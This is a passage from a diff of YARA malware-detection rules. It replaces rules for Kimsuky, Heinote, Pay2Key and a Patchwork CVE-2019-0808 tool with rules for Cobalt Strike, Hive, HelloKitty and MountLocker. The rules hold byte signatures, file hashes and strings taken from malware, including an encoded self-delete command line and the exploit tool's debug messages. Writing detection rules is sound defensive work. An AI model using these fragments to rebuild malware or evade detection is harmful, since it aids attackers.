00 00 00 8b 80 64 01 00 00 39 44 24 30 0f 8d e2 00 00 00 48 63 44 24 30 48 8b 8c 24 c0 00 00 00 48 8b 84 c1 68 01 00 00 48 89 44 24 58 48 8b 44 24 58 8b 4c 24 44 0f af 48 38 8b c1 89 44 24 60 c7 44 24 48 00 00 00 00 eb 0a 8b 44 24 48 ff c0 89 44 24 48 48 8b }
 
 	condition:
-		uint32( 0 ) == 0x46445025 and filesize > 25KB and $x1 and 4 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 200KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Kimsuky_PDF_Enc_Shellcode_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Cobaltstrike_Oct_2021_1 : FILE
 {
 	meta:
-		description = "Detect encoded Kimsuky shellcode used in fake PDF against South Korea"
+		description = "Detect Cobalt Strike implant"
 		author = "Arkbird_SOLG"
-		id = "8df7090a-6583-5d25-92bd-422e6b4191f7"
-		date = "2021-08-03"
-		modified = "2021-08-04"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-04/Kimsuky/APT_Kimsuky_PDF_Enc_Shellcode_Aug_2021_1.yara#L1-L22"
+		id = "89d46993-cc1b-536b-b1ab-a0e967d0d397"
+		date = "2021-10-30"
+		modified = "2021-10-30"
+		reference = "https://twitter.com/malwrhunterteam/status/1454154412902002692"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-29/Hive/MAL_CobaltStrike_Oct_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "54f549b92c232f789aff039c748f1f987e68e9ee10dfab309f2ecba16d574cdb"
-		score = 50
+		logic_hash = "4f1a2306b8279be67829d0d515063caae6a9d7a07078a43c2cbe62f675bcb450"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "83292ba7a1ddda6acf32181c693aa85b9e433fcb908a94ebccbed0f407a1a021"
-		hash2 = "512ad244c58064dfe102f27c9ec8814f3e3720593fe1e3ed48a8cb385d52ff84"
-		level = "Experimental"
+		hash1 = "f520f97e3aa065efc4b7633735530a7ea341f3b332122921cb9257bf55147fb7"
+		hash2 = "7370c09d07b4695aa11e299a9c17007e9267e1578ce2753259c02a8cf27b18b6"
+		hash3 = "bfbc1c27a73c33e375eeea164dc876c23bca1fbc0051bb48d3ed3e50df6fa0e8"
 		tlp = "white"
-		adversary = "Kimsuky"
+		adversary = "-"
 
 	strings:
-		$x1 = { 52 2f 53 2f 4a 61 76 61 53 63 72 69 70 74 3e 3e 0d 65 6e 64 6f 62 6a 0d }
-		$s1 = { 78 9c ec bd 6b 97 eb 4a 72 25 f6 57 8e b5 96 67 75 4f 6b 24 f0 25 8f a6 d5 b3 16 59 00 6a c8 19 80 06 86 28 9b 65 d9 b3 7a 58 b7 59 97 3c ea 96 fb 21 92 90 fb bf 3b 76 64 c6 23 93 f5 38 47 6a 8f f5 41 1f ee ba c5 03 12 40 66 46 46 c6 63 c7 8e 7f f8 }
-		$s2 = { 94 fe 9b f1 c7 1f e8 e3 0f f4 f1 87 19 fd 37 ff f9 17 fc db 8f f4 ed e2 e7 5f fe 1b fe ff df 7e fc 8b df fe f0 f7 5f 7f 79 f8 e1 27 7f f9 7f fc 5f cb 7f f7 fc cb 7f 37 16 ff ee af ff f6 67 7f fb 97 7f fb b7 bf f8 3f ff f2 f8 e7 74 e3 9f fe fc cb e5 f5 c7 af 3f 7c f9 c9 8f 5f fe 06 3f f9 fa c3 af 8f bf 7f a5 87 d3 fd e9 26 bf 7f fd f1 }
-		$s3 = { b6 7c 2a db e2 39 ae 67 75 d9 ee 56 ab 7e 27 f2 b5 2e ba 61 3d a5 f5 88 f3 5b 3f f6 b4 b6 6d d1 c9 fb ae 9a 20 93 63 5c cf 69 73 6e a6 dd 4e d6 6b 98 f4 67 92 01 fa 9e 3d 6f 98 f7 95 3c ef eb aa 3f 37 85 bd ef 70 69 c6 ba ea 77 4f }
-		$s4 = { 4d 51 d7 5b 7d de f2 96 c8 0b dd bf d9 2d e9 7d 87 85 ec 87 b6 a4 cf 43 dc 1f 55 37 d2 fd 2b 95 df 20 6f 45 ab e3 e1 eb 24 df 71 ff 40 fe 69 3f }
-		$s5 = { 0f 35 fc 43 53 cf 03 67 d3 85 fb 51 b6 49 5f 40 fa 5d a2 3f 7d 31 fb 0b 3d 6f 53 69 ff 78 aa 37 e8 f3 12 fe 35 3e 43 90 7c 9c e3 73 a6 78 1c 9c 21 ec bf 20 df eb f0 5a b7 76 6f fb ad 96 53 57 0f a4 fc c3 6a f5 6d fe 41 fc 19 ed f7 4f 78 3a e9 1f f8 23 3d 2b 8d 2f 86 79 d6 7b b2 f8 e0 85 f2 51 25 fc 70 8c }
+		$s1 = { 48 83 ec 10 4c 89 14 24 4c 89 5c 24 08 4d 33 db 4c 8d 54 24 18 4c 2b d0 4d 0f 42 d3 65 4c 8b 1c 25 10 00 00 00 4d 3b d3 f2 73 17 66 41 81 e2 00 f0 4d 8d 9b 00 f0 ff ff 41 c6 03 00 4d 3b d3 f2 75 ef 4c 8b 14 24 4c 8b 5c 24 08 48 83 c4 10 f2 c3 }
+		$s2 = { 89 ?? 24 ?? 8b ?? 24 0c 89 ?? 24 ?? 8b ?? 24 ?? c1 ?? 0d 89 ?? 24 0c 48 8b ?? 24 10 89 ?? 24 [2] 8b ?? 24 10 }
+		$s3 = { b8 10 00 00 00 48 89 45 ?? e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 8b 55 f8 89 11 4c 8b 45 ?? 4c 8b 4d f0 4d 89 08 4c 8b 55 ?? 4c 8b 5d e8 4d 89 1a 48 8b 75 ?? 48 8b 7d e0 48 89 3e c7 00 ?? 00 00 00 48 8b 05 [3] 00 48 05 [2] 00 00 8b 19 4d 8b 00 4d 8b 32 48 8b 0e 48 83 ec 20 4c 89 f2 41 89 d9 ff d0 48 83 c4 20 ?? 45 }
+		$s4 = { 48 83 ec 48 44 89 4c 24 44 4c 89 44 24 38 48 89 54 24 30 48 89 4c 24 28 c7 44 24 24 ?? 00 00 00 48 8b 05 [3] 00 48 05 [2] 00 00 44 8b 4c 24 44 4c 8b 44 24 38 48 8b 54 24 30 48 8b 4c 24 28 ff d0 90 48 83 c4 }
 
 	condition:
-		uint32( 0 ) == 0x46445025 and filesize > 25KB and $x1 and 4 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 20KB and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Heinote_June_2020_1 : FILE
+rule ARKBIRD_SOLG_RAN_ELF_Hive_Oct_2021_1 : FILE
 {
 	meta:
-		description = "Detect Hienote malware"
+		description = "Detect ELF version of Hive ransomware"
 		author = "Arkbird_SOLG"
-		id = "5c0e604a-83d4-5c6f-83fa-0df878da80d8"
-		date = "2020-06-26"
-		modified = "2023-11-22"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1276471822217891840"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-26/Heinote_June_2020-1.yar#L1-L29"
+		id = "434cfe85-3209-5990-9c68-47ce4fafd5b8"
+		date = "2021-10-29"
+		modified = "2021-10-30"
+		reference = "https://twitter.com/ESETresearch/status/1454100591261667329"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-29/Hive/RAN_ELF_Hive_Oct_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "679f1113c9c770910d18da395b13aaef009ecdde91a0c11f931d0d7e63ed122a"
-		score = 75
-		quality = 61
+		logic_hash = "47ccf3b825521986070dba92194d5937289c0335b922537ea3242c4afb2be237"
+		score = 60
+		quality = 35
 		tags = "FILE"
-		hash1 = "e0a34b9c420ddd930b3f89c13c3f564907dd948e88f668a0fe55ce506220bd73"
+		hash1 = "6a0449a0b92dc1b17da219492487de824e86a25284f21e6e3af056fe3f4c4ec0"
+		hash2 = "bdf3d5f4f1b7c90dfc526340e917da9e188f04238e772049b2a97b4f88f711e3"
+		tlp = "white"
+		adversary = "-"
+		level = "experimental"
 
 	strings:
-		$s1 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 53 45 54 5d 2d 2d 2d 2d }
-		$s2 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 47 45 54 5d 2d 2d 2d 2d }
-		$s3 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 47 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 47 65 74 4d 61 69 6e 50 61 67 65 20 6c 70 73 7a 75 72 6c 20 3d 20 25 73 }
-		$s4 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 53 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 73 74 61 74 75 73 20 3d 20 25 64 2f 25 64 20 67 65 74 20 3d 20 25 73 20 73 65 74 20 3d 20 25 73 }
-		$s5 = { 44 65 62 75 67 49 6e 66 6f }
-		$s6 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 46 41 56 5d 5b 53 45 54 5d 2d 2d 2d 2d }
-		$s7 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 46 41 56 5d 5b 53 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 66 61 76 20 72 65 74 20 3d 20 25 64 0a }
-		$s8 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 46 41 56 5d 5b 53 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 69 20 3d 20 25 64 20 6c 70 73 7a 4d 61 67 69 63 20 3d 20 25 73 0a }
-		$s9 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 53 45 54 43 4f 4f 4b 49 45 48 41 4f 31 32 33 5d 20 6f 6b 20 6f 6b 0a }
-		$s10 = { 75 73 65 72 6e 61 6d 65 3d 22 25 73 22 2c 20 72 65 61 6c 6d 3d 22 25 73 22 2c 20 6e 6f 6e 63 65 3d 22 25 73 22 2c 20 75 72 69 3d 22 25 73 22 2c 20 63 6e 6f 6e 63 65 3d 22 25 73 22 2c 20 6e 63 3d 25 30 38 78 2c 20 71 6f 70 3d 25 73 2c 20 72 65 73 70 6f 6e 73 65 3d 22 25 73 22 }
-		$s11 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x" fullword ascii
-		$s12 = { 25 73 20 63 6f 6f 6b 69 65 20 25 73 3d 22 25 73 22 20 66 6f 72 20 64 6f 6d 61 69 6e 20 25 73 2c 20 70 61 74 68 20 25 73 2c 20 65 78 70 69 72 65 20 25 49 36 34 64 0a }
-		$s13 = "User-Agent: %s" fullword ascii
-		$s14 = "Send failure: %s" fullword ascii
-		$s15 = "ftp://%s:%s@%s" fullword ascii
-		$s16 = "Host: %s%s%s" fullword ascii
-		$s17 = "Referer: %s" fullword ascii
+		$s1 = { 49 3b 66 10 76 ?? 48 83 ec ?? 48 89 6c 24 ?? 48 8d 6c 24 ?? 48 8b [3] 48 }
+		$s2 = { 48 89 f8 48 89 f3 48 83 ec 27 48 83 e4 f0 48 89 44 24 10 48 89 5c 24 18 48 8d 3d 41 [2] 00 48 8d 9c 24 68 00 ff ff 48 89 5f 10 48 89 5f 18 48 89 1f 48 89 67 08 b8 00 00 00 00 0f a2 89 c6 83 f8 00 74 33 81 fb 47 65 6e 75 75 1e 81 fa 69 6e 65 49 75 16 81 f9 6e 74 65 6c 75 0e c6 05 [3] 00 01 c6 05 [3] 00 01 b8 01 00 00 00 0f a2 89 05 [3] 00 48 8b 05 }
+		$s3 = { 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc }
+		$s4 = { 00 00 48 8b ac 24 68 02 00 00 48 81 c4 70 02 00 00 c3 ?? 80 ?? 0e [6] 48 8b [2] 48 }
 
 	condition:
-		uint16( 0 ) == 0x4D5A and filesize < 450KB and 14 of them
+		uint32( 0 ) == 0x464C457F and filesize > 20KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_Ran_Pay2Key_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_RAN_ELF_Hellokitty_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect Pay2Key ransomware"
+		description = "Detect HelloKitty ransomware"
 		author = "Arkbird_SOLG"
-		id = "440b8128-4708-54ba-94c3-c0b522004da6"
-		date = "2020-12-01"
-		modified = "2020-12-14"
+		id = "3e83f07a-0ee7-5381-9aba-2606c01b9d91"
+		date = "2021-08-14"
+		modified = "2021-08-14"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-14/Pay2Key/Ran_Pay2Key_Nov_2020_1.yar#L1-L31"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-14/HelloKitty/RAN_ELF_HelloKitty_Aug_2021_1.yara#L1-L17"
 		license_url = "N/A"
-		logic_hash = "f1ea1ed141ba7a1eaaa34c216adebfacaa23ef8776a0216b778ccb34bd000590"
+		logic_hash = "99816756ea0a680eb25da192c9f069082f6479befe4e50188ad8f90b323d1f2d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "5bae961fec67565fb88c8bcd3841b7090566d8fc12ccb70436b5269456e55c00"
-		hash2 = "d2b612729d0c106cb5b0434e3d5de1a5dc9d065d276d51a3fb25a08f39e18467"
-		hash3 = "ea7ed9bb14a7bda590cf3ff81c8c37703a028c4fdb4599b6a283d68fdcb2613f"
+		hash1 = "ca607e431062ee49a21d69d722750e5edbd8ffabcb54fa92b231814101756041"
+		hash2 = "b4f90cff1e3900a3906c3b74f307498760462d719c31d008fc01937f5400fb85"
+		tlp = "White"
+		adversary = "RAAS"
 
 	strings:
-		$s1 = "F:\\2-Sources\\21-FinalCobalt\\Source\\cobalt\\Cobalt\\Cobalt\\Win32\\Release\\Client\\Cobalt.Client.pdb" fullword ascii
-		$s2 = ".\\Cobalt-Client-log.txt" fullword ascii
-		$s3 = ".\\Config.ini" fullword wide
-		$s4 = "Local\\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag" fullword ascii
-		$s5 = "\\Microsoft\\Windows\\Themes\\TranscodedWallpaper" fullword ascii
-		$s6 = { 40 00 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 43 00 20 00 70 00 69 00 6e 00 67 00 20 00 31 00 2e 00 31 00 2e 00 31 00 2e 00 31 00 20 00 2d 00 6e 00 20 00 31 00 20 00 2d 00 77 00 20 00 33 00 30 00 30 00 30 00 20 00 3e 00 20 00 4e 00 75 00 6c 00 20 00 26 00 20 00 44 00 65 00 6c 00 20 00 2f 00 66 00 20 00 2f 00 71 00 20 00 22 00 25 00 73 00 22 }
-		$s7 = "%WINDRIVE%" fullword wide
-		$s8 = "%WINDIR%" fullword wide
-		$dbg1 = "message.txt" fullword ascii
-		$dbg2 = "Failed To Get Data...." fullword ascii
-		$dbg3 = "lock.locked()" fullword wide
-		$dbg4 = { 47 65 74 41 64 61 70 74 65 72 73 49 6e 66 6f 20 66 61 69 6c 65 64 20 77 69 74 68 20 65 72 72 6f 72 3a 20 25 64 0a }
-		$dbg5 = { 43 72 79 70 74 41 63 71 75 69 72 65 43 6f 6e 74 65 78 74 20 66 61 69 6c 65 64 3a 20 25 78 0a }
-		$dbg6 = { 43 72 79 70 74 44 65 72 69 76 65 4b 65 79 20 66 61 69 6c 65 64 3a 20 25 78 0a 00 00 25 00 64 }
-		$dbg7 = { 5b 2d 5d 20 43 72 79 70 74 45 6e 63 72 79 70 74 20 66 61 69 6c 65 64 0a }
+		$seq1 = { 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 [2] ff ff 48 8b 05 ?? 13 21 00 48 8b 3d ?? 14 21 00 48 89 e9 ba ?? 0c 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e2 ff ff 48 8b 3d ?? 14 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 05 ?? 13 21 00 48 8b 3d ?? 12 21 00 48 89 e9 ba ?? 0c 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e2 ff ff 48 8b 05 [2] 21 00 b9 ?? 0c 41 00 ba 80 00 00 00 be 01 00 00 00 4c 89 e7 48 8b 04 18 44 8b 00 31 c0 e8 ?? e5 ff ff 4c 89 e7 e8 cd 10 00 00 48 85 c0 49 89 c7 0f 84 9b 00 00 00 48 83 3d ?? 13 21 00 00 74 60 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 ?? e3 ff ff 48 8b 05 ?? 12 21 00 48 8b 3d ?? 13 21 00 48 89 e9 ba [2] 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e1 ff ff 48 8b 3d ?? 13 21 00 e8 ?? e6 ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 05 ?? 12 21 00 48 8b 3d [2] 21 00 48 89 e9 ba [2] 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e1 ff ff }
+		$seq2 = { 31 c0 b9 40 00 00 00 48 89 ef f3 ab be ?? 0d 41 00 48 89 df e8 [2] ff ff 48 85 c0 49 89 c5 0f 84 4c 01 00 00 48 89 c2 48 89 de 48 89 ef 48 29 da e8 71 07 00 00 be 3a 00 00 00 48 89 ef e8 [2] ff ff 48 8d 78 01 e8 [2] ff ff 85 c0 41 89 c7 0f 84 04 01 00 00 bf 10 00 00 00 e8 ?? dd ff ff 4c 89 ef 44 89 38 49 89 c6 48 89 04 24 e8 3d f5 ff ff 48 83 3d ?? 0e 21 00 00 49 89 46 08 74 6f 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 [2] ff ff 48 8b 04 24 48 8b 0d ?? 0d 21 00 ba ?? 0d 41 00 48 2b 0d ?? 0d 21 00 48 8b 3d ?? 0e 21 00 be 01 00 00 00 4c 8b 48 08 44 8b 00 31 c0 48 c1 f9 03 48 ff c1 e8 ?? dc ff ff 48 8b 3d [2] 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 04 24 48 8b 0d [2] 21 00 be 01 00 00 00 48 2b 0d [2] 21 00 48 8b 3d ?? 0c 21 00 ba ?? 0d 41 00 4c 8b 48 08 44 8b 00 31 c0 48 c1 f9 03 48 ff c1 e8 [2] ff ff 48 8b 35 [2] 21 00 48 3b 35 [2] 21 00 74 16 48 85 f6 74 07 48 8b 04 24 48 89 06 48 83 05 [2] 21 00 08 eb 0d 48 89 e2 bf e0 49 61 00 e8 af 02 00 00 48 8d 7b 01 be ?? 0d 41 00 e8 ?? dd ff ff 48 89 c3 e9 86 fe ff ff 4d 85 e4 74 08 4c 89 e7 e8 [2] ff ff 48 83 3d ?? 0d 21 00 00 74 61 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 [2] ff ff 48 8b 0d ?? 0c 21 00 48 2b 0d ?? 0c 21 00 ba ?? 0d 41 00 48 8b 3d ?? 0d 21 00 be 01 00 00 00 31 c0 48 c1 f9 03 e8 ?? db ff ff 48 8b 3d [2] 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 0d ?? 0c 21 00 48 2b 0d [2] 21 00 31 c0 48 8b 3d ?? 0b 21 00 ba ?? 0d 41 00 be 01 00 00 00 48 c1 f9 03 e8 [2] ff ff 48 8b 84 24 18 01 00 00 64 48 33 04 25 28 00 00 }
+		$seq3 = { 48 8d b4 24 90 00 00 00 bf d0 4a 61 00 48 c7 84 24 98 00 00 00 00 00 00 00 48 c7 84 24 90 00 00 00 01 00 00 00 e8 [2] ff ff e8 ?? 22 00 00 89 44 24 08 8b 05 [2] 21 00 89 d9 44 8b 0d [2] 21 00 44 8b 05 [2] 21 00 ba ?? 0e 41 00 48 8b 3d [2] 21 00 be 01 00 00 00 89 04 24 31 c0 e8 ?? f8 ff ff 48 8b 3d [2] 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 31 f6 ba 0a 00 00 00 bf 40 4a 61 00 e8 ?? fa ff ff ba 0a 00 00 00 31 f6 bf 20 4a 61 00 e8 ?? fa ff ff be 01 00 00 00 bf 11 00 00 00 e8 [2] ff ff be 01 00 00 00 bf 14 00 00 00 e8 [2] ff ff be 01 00 00 00 bf 16 00 00 00 e8 [2] ff ff be 01 00 00 00 bf 15 00 00 00 e8 [2] ff ff 83 3d ?? 28 21 00 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 500KB and ( 5 of ( $s* ) and 4 of ( $dbg* ) )
+		uint32( 0 ) == 0x464C457F and filesize > 20KB and all of ( $seq* )
 }
-
-rule ARKBIRD_SOLG_APT_Patchwork_Tool_CVE_2019_0808_1 : FILE
+rule ARKBIRD_SOLG_RAN_Mountlocker_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect CVE 2019-0808 tool used by Patchwork group"
+		description = "Detect the Mountlocker ransomware"
 		author = "Arkbird_SOLG"
-		id = "169255fe-dd7a-5a4e-8f0f-d84a0cf5c684"
-		date = "2020-08-27"
-		modified = "2021-07-13"
-		reference = "https://blog.exodusintel.com/2019/05/17/windows-within-windows/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-27/APT_Patchwork_Tool_CVE_2019_0808_1.yar#L3-L34"
+		id = "0bc0d341-4658-500e-b487-1993e5431560"
+		date = "2020-05-12"
+		modified = "2021-05-16"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-12/Astrolocker/RAN_MountLocker_May_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "e66df5d69d64c00cb68ff7bea0f7a7eec6657aff83d0f6cdb48d908bae8bcec8"
-		score = 50
+		logic_hash = "c0826d4c740b5c46b704b42e002602dd0cda2b6d1bf0ba5431877be8bd600b64"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "49f8a9203e5055777a67490923243405b9aa519016645fd75731c53cbf02073c"
-		level = "Experimental"
+		hash1 = "0aa8099c5a65062ba4baec8274e1a0650ff36e757a91312e1755fded50a79d47"
+		hash2 = "f570d5b17671e6f3e56eae6ad87be3a6bbfac46c677e478618afd9f59bf35963"
+		hash3 = "5eae13527d4e39059025c3e56dad966cf67476fe7830090e40c14d0a4046adf0"
+		tlp = "White"
+		adversary = "MountLocker"
 
 	strings:
-		$asm1 = { 8b 3d 44 21 01 10 6a 00 6a 00 6a 01 6a 01 6a 00 6a 00 68 00 00 00 08 68 e4 7e 01 10 68 e8 7e 01 10 6a 00 ff d7 50 68 f0 7e 01 10 a3 c8 a2 01 10 e8 e8 f7 ff ff 8b 35 68 21 01 10 8d 84 24 5c 01 00 00 83 c4 08 c7 84 24 54 01 00 00 1c 00 00 00 0f 57 c0 c7 84 24 58 01 00 00 10 00 00 00 66 0f 13 84 24 60 01 00 00 66 0f 13 84 24 68 01 00 00 50 ff b4 24 1c 01 00 00 c7 84 24 64 01 00 00 00 00 00 60 ff d6 8d 84 24 54 01 00 00 50 ff 74 24 10 ff d6 8b 35 5c 21 01 10 68 04 7f 01 10 ff 74 24 10 68 10 04 00 00 ff b4 24 24 01 00 00 ff }
-		$asm2 = { a1 14 21 01 10 0f 57 c0 8b 74 24 08 89 84 24 28 01 00 00 8d 84 24 20 01 00 00 50 c7 84 24 28 01 00 00 00 00 00 00 66 0f 13 84 24 3c 01 00 00 c7 84 24 44 01 00 00 00 00 00 00 c7 84 24 50 01 00 00 00 00 00 00 c7 84 24 24 01 00 00 30 00 00 00 c7 84 24 30 01 00 00 00 00 00 00 c7 84 24 34 01 00 00 00 00 00 00 89 b4 24 38 01 00 00 c7 84 24 48 01 00 00 00 00 00 00 c7 84 24 4c 01 00 00 10 7f 01 10 ff 15 64 21 01 10 6a 00 56 6a 00 6a 00 6a 01 6a 01 6a 00 6a 00 68 00 00 00 08 68 20 7f 01 10 68 10 7f 01 10 6a 00 ff d7 6a 00 50 6a 00 6a 00 a3 ec a2 01 10 6a 00 ff b4 24 2c 01 00 00 ff 15 58 21 01 }
-		$asm3 = { e8 72 fb ff ff 83 c4 08 68 c0 13 00 10 6a fc ff 76 0c ff 15 54 21 01 10 56 ff 75 0c ff 75 08 6a 00 ff 15 24 21 01 10 5f 5e 5b 5d }
-		$s1 = "[*] Successfully exploited CVE-2019-0808 and triggered the shellcode!" fullword ascii
-		$s2 = "[!] Failed to find the address of IsMenu within user32.dll." fullword ascii
-		$s3 = "Sending hSecondaryWindow a WM_ENTERIDLE message to trigger the execution of the shellcode as SYSTEM." fullword ascii
-		$s4 = "AppPolicyGetProcessTerminationMethod" fullword ascii
-		$s5 = "[*] Found target windows!" fullword ascii
-		$s6 = "[*] addressOfIsMenuFromStartOfUser32: 0x%08X" fullword ascii
-		$s7 = "[*] FakeMenu: %p" fullword ascii
-		$s8 = "[*] Primary window address: 0x%08X" fullword ascii
-		$s9 = "[!] Didn't exploit the program. For some reason our privileges were not appropriate." fullword ascii
-		$s10 = "[*] hUser32: 0x%08X" fullword ascii
-		$s11 = "[*] Secondary window address: 0x%08X" fullword ascii
-		$s12 = "[*] Offset: 0x%08X" fullword ascii
-		$s13 = "[*] pHmValidateHandle: 0x%08X" fullword ascii
-		$s14 = "[*] HWND: %p " fullword ascii
-		$s15 = "[*] pIsMenuFunction: 0x%08X" fullword ascii
-		$s16 = "[*] Destroyed spare windows!" fullword ascii
-		$s17 = "[!] SetWindowLongA malicious error: 0x%08X" fullword ascii
+		$seq_Sep_2020_1 = { 40 53 48 81 ec f0 02 00 00 b9 e8 03 00 00 ff 15 ec 1a 00 00 bb 68 00 00 00 48 8d 4c 24 70 44 8b c3 33 d2 e8 9c 00 00 00 ba 04 01 00 00 89 5c 24 70 48 8d 8c 24 e0 00 00 00 ff 15 51 1a 00 00 48 8d 15 a2 9c 00 00 48 8d 8c 24 e0 00 00 00 ff 15 64 1a 00 00 48 8d 44 24 50 45 33 c9 48 89 44 24 48 48 8d 94 24 e0 00 00 00 48 8d 44 24 70 45 33 c0 48 89 44 24 40 33 c9 48 83 64 24 38 00 48 83 64 24 30 00 c7 44 24 28 10 00 00 00 83 64 24 20 00 ff 15 c1 19 00 00 8b d8 85 c0 74 16 48 8b 4c 24 58 ff 15 50 1a 00 00 48 8b 4c 24 50 ff 15 45 1a 00 00 8b c3 48 81 c4 f0 02 }
+		$seq_Sep_2020_2 = { 68 00 00 00 f0 6a 01 68 a0 51 00 10 57 8d 45 f8 89 5d f4 50 89 7d f8 89 7d fc ff 15 30 50 00 10 85 c0 0f 84 81 00 00 00 8d 45 fc 50 57 57 68 14 01 00 00 68 d0 d0 00 10 ff 75 f8 ff 15 08 50 00 10 8b f0 85 f6 74 26 68 00 01 00 00 8d 45 f4 50 68 60 42 01 10 57 6a 01 57 ff 75 fc ff 15 04 50 00 10 ff 75 fc 8b f0 ff 15 00 50 00 10 57 ff 75 f8 ff 15 0c 50 00 10 }
+		$seq_Jan_2021_1 = { 48 21 4d 77 4c 8d 05 [2] 00 00 48 21 4d 6f ?? 8b ?? 48 8d 4d 77 [6-9] c7 44 24 20 00 00 00 f0 ff 15 [2] 00 00 85 c0 0f 84 [2] 00 00 48 8b 4d 77 48 8d 45 6f 48 89 44 24 28 48 8d [3] 00 00 83 64 24 20 00 [2-5] c9 41 b8 14 01 00 00 ff 15 [2] 00 00 8b d8 85 c0 74 3b 48 8b 4d 6f 48 8d 45 67 c7 44 24 30 00 01 00 00 45 33 c9 48 89 44 24 28 ?? 8b ?? 48 8d 05 [2-3] 00 33 d2 48 89 44 24 20 ff 15 [2] 00 00 48 8b 4d 6f 8b d8 ff 15 [2] 00 00 48 8b 4d 77 33 d2 ff 15 [2] 00 00 85 db [4-12] 00 00 48 8d }
